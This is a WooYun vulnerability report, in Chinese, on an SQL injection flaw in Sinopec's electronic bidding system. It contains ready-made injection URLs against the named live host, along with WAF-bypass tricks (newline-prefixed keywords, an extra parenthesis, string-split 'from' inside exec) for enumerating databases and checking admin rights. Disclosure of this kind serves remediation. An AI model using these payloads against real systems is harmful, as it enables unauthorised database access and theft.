当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157672

漏洞标题:中石化某系统存在系统权限报错注入漏洞(绕过WAF注入)

相关厂商:中国石油化工股份有限公司

漏洞作者: 路人甲

提交时间:2015-12-02 17:55

修复时间:2015-12-07 17:56

公开时间:2015-12-07 17:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-02: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中石化某系统存在DBA权限注入漏洞(绕过WAF注入)

详细说明:

中石化电子招标系统存在注入漏洞
该系统用来发布招标公告、通知、中标候选人公示、中标结果公告等重要信息。
该系统有WAF,但是规则过滤不严格 可以突破规则进行注入

http://eb.sinopec.com//TPWeb/Showinfo/SearchResult.aspx?keyword=(%27%0Aand%20@@SERVERNAME%3E1--&searchtype=1


参数keyword过滤不严格,其中过滤了() select from等等关键字
绕过方法:
对于select等关键字可以在其前面加%0a绕过
对于() 应该是正则匹配成对括号然后过滤,可以多构造一个( ,绕过比如
(';exec('select%0acount(*)%0af'%2b'rom%0alabeng%0awhere%0alala>1')--
对于其他关键字的绕过 直接在exec里面 用字符拼接绕过,比如这里的from :
exec('select%0acount(*)%0af'%2b'rom%0alabeng%0awhere%0alala>1')

漏洞证明:

报数据库名

1.png


http://eb.sinopec.com//TPWeb/Showinfo/SearchResult.aspx?keyword=%28%27;exec%28%27select%0A1%0Awhere%0A1=%28select%0Aname%0Afr%27%2b%27om%0Amas%27%2b%27ter.d%27%2b%27bo.sysd%27%2b%27atabases+where+dbid=1%29%27%29--&searchtype=1

3.png


user_name:

2.png


判断是否为系统权限:

4.png


返回空白表示条件为假,有信息返回表示为系统权限
判断是否有数据库管理权限

5.png


返回真

修复方案:

完善WAF过滤规则

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-07 17:56

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无